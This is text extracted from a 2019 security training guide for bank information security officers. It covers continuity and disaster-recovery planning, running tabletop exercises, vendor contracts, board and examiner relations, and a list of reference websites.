Sabotage (by non-employee) 10 2 20
Terriorist Act (biological / chemical) 1 2 2
Terriorist Act (conventional) 5 2 10
Work Stoppage 5 2 10

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Strategy Development
Three Scenarios to Plan for:

• Your facility is not available/accessible
• Critical systems and/or services are not available
• Personnel, yours or external, are unavailable (snow, ice, pandemic, etc.)
Two Phases to Plan for:

• Response - Immediately following the event
• Recovery - Over the long term
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

IT
Business Incident Commun-
Disaster Pandemic Vendors’
Continuity Response ications
Recovery Plan Plans
Plans Plan Plan
Plan
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Business Continuity Plans
• Focused on the continuation of business, during abnormal

events
• Likely involves alternate processing means
• Departmental or business unit oriented
• IT Disaster Recovery Plan is a subset of the organization’s
overall Business Continuity Plan
• Include:
– Contacts
– Resource needs (people and other) and responsibilities
– Work locations
– References to other documents (i.e., SOP’s)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

IT Disaster Recovery Plan
• Focused on the restoration and recovery of the organization’s

IT infrastructure
• Include:
– Human and technical resource requirements
– Prioritizations (e.g., Active Directory → Virtual Environment → Core
→ Internet Banking → etc.)
– Declaration procedure and responsibilities
– Process for operating at alternate facility
– Checklists for returning to normal production
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Pandemic Plan
• Focus on process for operating with limited staffing

• Don’t limit to specific illness or medical condition
• Don’t hard-link to WHO or CDC declarations
• Test – Day after Thanksgiving, July 5th, snow day, etc.
• “Tag out” people before/during other tests
• Include:
– Contacts, especially medical and governmental
– Shelter-in-place needs (e.g., food, hygiene items, medicines, etc.)
– “Must perform” tasks, and identify areas that can be postponed
– Considerations for “working from home” (i.e., remote access, pay, etc.)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Communications Plan
• Focus on different audiences (customers, Board, employees,

front-line staff, regulators, management, vendors, etc.)
• Don’t plan to say “No comment” – it implies guilt
• Use positive statements (e.g. “We are working to obtain all the
facts. At this time our focus is on our customers, staff…”)
• Methods: Call tree, website, notification service, call-in line, etc.
• Include:
– Contacts – Internal and external (PR, LE, legal team, governmental)
– Clearly indicate who can represent the organization; have backup(s)
– Call tree and/or other methods to contact staff
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Vendors’ Plans
• Part of Vendor Management program (incl. in due diligence)

• Know what to expect of your key vendors when they
experience a contingency situation
• Know how the vendor can aid when your organization is the
one experiencing the disruption
• Include:
– Contacts – Especially the ones that can provide priority responses
– How to contact vendors if their normal facilities/contacts are
disrupted
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Training and Testing
• Personal safety is first priority – train for it

– Evacuation plans
– Access of compromised / damaged facility
– Responsibility thresholds (e.g., use fire extinguisher if you can do so without
compromising your own safety)
• Brief is good. Don’t bury employees with the entire plan, just train
for the areas they specifically need, and make aware of other areas.
• Exercises, in particular Tabletop Exercises, are excellent training
methods.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Walk-through exercises
• Participants step through plan document(s); may break into
smaller groups to review task or department specific plans
– Pro’s: Simple to conduct with little-to-no preparation needed. Useful
for determining document completeness and responsibility
assignments.
– Con’s: Usually poor at identifying gaps in planning or in expectations.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Tabletop exercises
• Facilitated exercise where a specific scenario is presented.
Usually a group discussion, and not a “technical” exercise.
• Participants respond to exercise events, using the
organization’s plans and their business knowledge to respond
to evolving situation.
– Pro’s: Excellent at identifying planning gaps. Minimal preparation
time commitment for participants.
– Con’s: Facilitator may inadvertently create only scenarios that fit the
organization’s plan(s). Can take significant time for facilitator(s) to
develop exercise.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Component testing
• Technical exercise; used to evaluate recoverability of discreet
servers/devices, up to entire “systems” (but not the entire IT
environment)
– Pro’s: For a technical exercise, it usually presents minimal risk to
production operations, and is relatively simple to schedule/plan.
– Con’s: Doesn’t test restoration and interoperation of multiple systems
(e.g., core and Internet banking). Does little to evaluate resource
constraints when multiple “priority” systems are needed concurrently.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Comprehensive testing
• Technical exercise; used to evaluate recoverability of all
systems needed for the organization’s production operations.
• Should include recovery of systems, and testing the
applications function and expected data is accessible.
– Pro’s: Usually the best test of the organization’s ability to recover from
a major technical disaster.
– Con’s: Significant planning effort required. Often results in at least a
temporary increase of risk to regular operations (e.g., staffing or
backup systems are repurposed for exercise).
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Documentation
• Test plan
– Scope
– Objectives
– Assumptions
– Limitations
• Test scripts and supporting information
(copies of reports, vendor info, timeline, etc.)
• Provide wrap-up report to Board
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Tabletop Exercise Development
Tabletop exercise planning

• Determine Participants
• Define Objectives (Including any that are “unstated”)
• Develop Scenario:
– Pick scenario that touches on most or all Goals and Objectives
– Choose major challenges that will be used to drive main scenario narrative
– Create scenario timeline
– Fill in timeline with “noise,” simultaneous events, comms issues, distractions, etc.
– Include challenges for each person/role that will be in exercise
– Plan for the unexpected (e.g., dominant participant, unrealistic responses, etc.)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Tabletop exercise planning

• Real life is messy; the scenario should attempt to mimic
• Use “injects” and planning spreadsheet (from course materials) to fill in
timeline gaps
• Prepare for hidden agendas or difficult personalities
• Check for “historical events” to ensure you don’t accidentally touch on a
sensitive experience
• Be prepared to “take someone out,” but do it gently!
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________


FOX-14 news crew is setup across the street and reporting
13 12:20 PM
live on noon news.
A customer calls in requesting balance info, and wondering if

he should close his account. But there is no customer on
record with the name he gives. He is angry, tells the bank
14 12:30 PM
employee he is going to come to the <name> Branch right
now and close his account and his money had better be
there.
15 12:40 PM <insert name> calls wanting to know what is really going on.
An employee returning from lunch says there is a TV crew

outside and they asked her some questions. “I didn’t tell
16 12:50 PM them anything! When they asked what the problem was I told
them I had nothing to say about the hackers that got into our
systems!”
Phone call quality issues are continuing to be a problem.

17 1:15 PM More customers are calling in after hearing the news and
10-D Security calls being dropped are occurring more frequently.
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

You can use handouts to “force” participants to speak, and to

make sure everyone has something to comment on.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Conducting a tabletop exercise

• Review the stated objectives of the exercise
• Go over “assumptions” (e.g., current functions, management,
no wrong/right answers, info provided is accurate, etc.)
• “Rules” of the exercise:
– Don’t get wrapped up in the artificiality
– No “easy” fixes
– Base answers on reality and for the simulated timeframe of exercise
– Enjoy the exercise – participation is key!
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

A few tips for developing and running an exercise:

• Use humor when possible
• Facilitator should be neutral, and shouldn’t provide answers
• Have a scribe dedicated to taking notes throughout
• Use “head fakes” at start, so major events are a surprise
• Include “noise” and current events to make it “real”
• It’s okay to not have a clean ending
• Food is rarely a bad idea
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The Declaration
• Define and document who is authorized to declare a disaster,

especially if there is a third-party involved (e.g., outsourced
core, alternate data center, IT service provider, etc.)
• Usually there is a cost to “declare” with a third-party, whether
you actually use the service or not
• Understand what the vendor’s service obligation includes,
especially the committed time to respond
• Before you declare a disaster, you may wish to consider the
level of effort required to “fail back” to normal operations
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Tips
• Exercises can be tolerable, and maybe even fun. Permit

casual dress, music, etc. Provide snacks, light meal, etc.
• For advanced exercises, “tag out” personnel to promote
procedure development, cross-training, and to evaluate
pandemic plans.
• Know who your “key personnel” are in advance; you may
need to provide special case support (child care, family care,
hotel, clothing allowance, etc.).
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Other Considerations
• Regional events will likely cause higher absenteeism, but may

provide a degree of “grace” for recovery.
• If contingency is isolated to just your organization there will
likely be less “forgiveness” given by the customers and
community.
• Real contingencies will affect people differently; some will
step up and some may withdraw.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 8: Vendor Management
Topics:
• Relationship Management
• Expectations of Vendors
• During Out of the Ordinary Events
“Most of what we call management consists of making it difficult for

people to get their work done.”
- Peter Drucker
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Vendors – Common Issues
Vendor is unresponsive to audit/exam findings – Some service

providers do not understand or are unwilling to remediate issues.
Response: Your contract is the place to start. Look for language in the
contract that indicates the vendor must adhere to regulatory requirements or
other industry practices. Depending upon the services provided by the
vendor, and complexity in replacing them, you may end up needing to
research alternatives. In all cases, keep good documentation in case
separation occurs and to be able to show actions to examiners.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Vendors – Common Issues
Vendor is unwilling/unable to provide information – What do you

do when “Enormous Core Provider” won’t provide you with the configuration
for “your” firewall? Or they refuse to provide information on their latest
external vulnerability assessment?
Response: Again, look in your contract to determine if there is anything
that obligates them to provide the information. If not, you may have little
recourse. However, it is often useful to contact other areas within the vendor
to find an advocate for you (e.g., sales, executive contact, friendly support
manager, etc.). As before, keep documentation as supporting evidence that
you made a reasonable attempt to obtain.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Vendors – Look Before You Buy
• Is the vendor of the caliber your institution expects/requires?

• Does the vendor have a good reputation for working with other vendors?
• Can the vendor prove their solution integrates with your environment?
• Will the vendor provide the service the bank expects? As an example, will
they provide detailed weekly/monthly reports or on-demand information
requests, or do they say “We’ll tell you what you need to know…”?
• Could they off-shore any of the services? Depending upon the services
involved, it may be worth knowing what, if any, off-shore connections may
exist. Regulations exist covering what customer data can leave the U.S.
Note: See MSP expectations checklist in course materials.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Vendors – Technology Aspects
Breach Notifications – Define:

• Time to notify – How long until vendor must notify bank?
• Contacts – Does the vendor know who to contact?
• Method – Written notifications may be delayed (expect legal reviews).
• Vendor’s vendor breach – Make sure vendor knows they must notify you
even if the breach was at their vendor.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Miscellaneous:
• Obtain “Summary Exam Reports” from regulator for key vendors
• Increase in contract negotiators, especially for core services
• Include “right to audit” in contracts, or obtain in writing separately
• For critical technology providers, consider performing on-site
reviews
• Set expectations prior to contract signing, while you have leverage
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Miscellaneous:
• Monitor and log vendor access to your network and systems
• IT support vendor shouldn’t perform audits, firewall reviews,
security testing, etc. (“fox watching the hen house”)
• Contract warning signs:
– Tight or restrictive renewal windows for auto-renewing contracts
– No exit clauses
– Deliberately vague language
– Governing Law not in your state
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

“It’s not me, it’s YOU…”

• Know what the contract allows for separation of services
• Who owns the data, passwords, source code, etc. after termination?
• Include language in contract that vendor must assist in separation
• Spell out in contract that data must be returned (don’t allow
indefinite storage or customer data in vendor’s archives)
• Ownership of domain registrations, keys, licenses, etc. should all be
defined in the contract (nightmare scenario)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 9: Politics
Topics:
• Board
• IT
• Auditors and Examiners
• Do’s and Don’ts
• Other Miscellaneous
“It is said that a fool only learns from his own mistakes, a wise man from the
mistakes of others.”
- Otto Von Bismark (1815-1898)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Board
• If there is not a direct line of responsibility/reporting to the

Board, your messages may be filtered
• Assume regulators will see everything in Board reports
• Determine Board’s tolerance/understanding of IT and InfoSec
– Communicate to their level of understanding, not above.
– If there’s a “technology-aware” Board member, get to know him/her!
– When in doubt, adhere to “The Rule of 3”
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

IT
• Many variables, especially if you are within the IT reporting

structure.
– Do you have a degree of trust within the organization for concerns to
be heard at the appropriate levels, or are you “filtered?”
– Have you provided security checklists they can use? (server hardening,
new system risk assessment, change request form, InfoSec exceptions)
– Is there a trusted person/group within IT that will provide internal
support?
– Do you have a back-channel person of authority that you can go to
with concerns?
– Do you have an auditor that can bring attention to areas that you’ve
encountered resistance?
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Auditors and Examiners
• Develop a checklist for your annual and on-going responsibilities

and review status prior to audit/exam.
• Even if the institution doesn’t have a great relationship with the
external entity, you should make an effort to have a good working
connection.
• Golden Rule at exam/audit time.
• Remember to request Summary Exam Reports for your key vendors.
• Make sure issue tracking spreadsheet is up to date.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Do’s and Don’ts

• Do Budget
• Do make business cases (with options, including “doing nothing”)
• Do consider customers, operations, IT, others before implementing
significant changes (“Look both ways when crossing a one-way street!”)
• Do document (policies, changes, training, exercises, vendor
interactions, etc.)
• Do “under promise” and “over deliver”
• Do be an educator (not a dictator)
• Don’t be the “Department of NO!”
• Don’t try to impress with knowledge
• Don’t use FUD, but if you do make it a rarity
• Don’t overreact
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Other Miscellaneous
• Have a budget, or work to GET a budget! Track significant security

expenses throughout the year, and build a realistic budget.
• You are responsible for information security, so “live it” and
demonstrate proper work behavior.
• You will, eventually, miss something or make a significant mistake.
If you overreact when other management falls short they will likely
more-than-reciprocate when you make an error.
• Get included in other areas’ meetings to stay abreast of new
systems, services, functions, etc. It is easier to implement security
the earlier it is introduced in the process.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Other Miscellaneous (or, Welcome to the EU!)
General Data Protection Regulation (GDPR)

• Effective May 2018, may have to comply regardless of location IF
institution holds or processes information for a resident of EU
• Appears to require many security provisions, such as:
– Affirmative consent by consumer to permit information sharing
– Breach notifications within 72 hours of detection
– Data flow diagrams for customer data
– Right to be forgotten / Right to data portability
– Data Protection Officer (depends on institution’s function and size)
• Unclear how (or IF) enforcement in the U.S. might occur
For details: https://www.eugdpr.org/
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 10: Wrap-Up

Topics:
• Miscellaneous Information
• Contact Info (optional)
• Questions
• Course Evaluation
• Certificate
“Being the first to cross the finish line makes you a winner in only one phase of
life. It's what you do after you cross the line that really counts.”
- Ralph Boston
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Know Where to Get Information
Websites of some value or interest:

• DNSStuff Toolbox http://www.dnsstuff.com/tools
• CVE Details https://www.cvedetails.com/
• TinEye Reverse Image Search https://www.tineye.com/
• Mozilla Observatory https://observatory.mozilla.org/
• PunkSPIDER https://www.punkspider.org/
• The Wayback Machine https://archive.org/web/
• Google Hacking Database https://www.exploit-db.com/google-hacking-
database/
• European Union GDPR FAQ https://www.eugdpr.org/gdpr-faqs.html
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

And more websites:

• Chronology of Data Breaches https://www.privacyrights.org/data-breaches
• Verizon Data Breach Investigations Report
http://www.verizonenterprise.com/verizon-insights-lab/dbir/
• VirusTotal https://www.virustotal.com/
• Payload Security - https://www.hybrid-analysis.com/
• Zabasearch http://www.zabasearch.com
• Securi Website scanner - https://sitecheck.sucuri.net/
• Check if your info has been compromised https://haveibeenpwned.com/
• 10-D’s Weekly Security Tip https://10dsecurity.com/weekly-security-tips/
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Some websites to obtain financial info for vendors:

• 451 Research https://451research.com/
• Forrester https://go.forrester.com/
• Gartner http://www.gartner.com
• Google Finance https://finance.google.com/
• IASPlus http://www.iasplus.com/en/resources/ifrs-topics/use-of-ifrs
• IDC http://www.idc.com/
• Morningstar http://financials.morningstar.com/
• Nasdaq http://www.nasdaq.com/
• SEC EDGAR http://www.sec.gov/edgar.shtml
• Yahoo Finance http://finance.yahoo.com/
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Search Queries
Try these in on-line search engines:

• “company_name” “annual report” filetype:pdf
• “company_name” financial report year filetype:pdf
• site:company_domain.com filetype:pdf (or docx or xlsx or pptx)
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

THANK YOU!!!
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

CEH Advanced ISO Course Guide (2019) PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CEH Advanced ISO Course Guide (2019) PDF

Uploaded by

Copyright:

Available Formats

10-D Academy Advanced ISO Course

©2019 10-D, Inc. All Rights Reserved 1

2 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 2

3 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 3

4 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 4

Section 1: Setting the Stage

“We have met the enemy and he is us.”

5 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 5

1. Role Description and Structure

6 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 6

Know your Enemy

©2019 10-D, Inc. All Rights Reserved 7

©2019 10-D, Inc. All Rights Reserved 8

What do They Want?

©2019 10-D, Inc. All Rights Reserved 9

“We don’t have anything anyone would want!”

©2019 10-D, Inc. All Rights Reserved 10

• Visible – Your brand is well known to the public

©2019 10-D, Inc. All Rights Reserved 11

©2019 10-D, Inc. All Rights Reserved 12

Status Quo Security

• Compromise happens in seconds

©2019 10-D, Inc. All Rights Reserved 13

How do you attack a fortress?

Have someone let you in…

©2019 10-D, Inc. All Rights Reserved 14

• Network attack (remote)

©2019 10-D, Inc. All Rights Reserved 15

How many phishing emails does it take to get to

©2019 10-D, Inc. All Rights Reserved 16

©2019 10-D, Inc. All Rights Reserved 17

Not an “m” but an “r” and “n” together

©2019 10-D, Inc. All Rights Reserved 18

19 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 19

20 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 20

21 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 21

1. What is your institution doing to defend its information?

2. How would your institution know if the network were

22 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 22

Section 2: Hacking Demo

23 ©2019 10-D, Inc. All Rights Reserved.

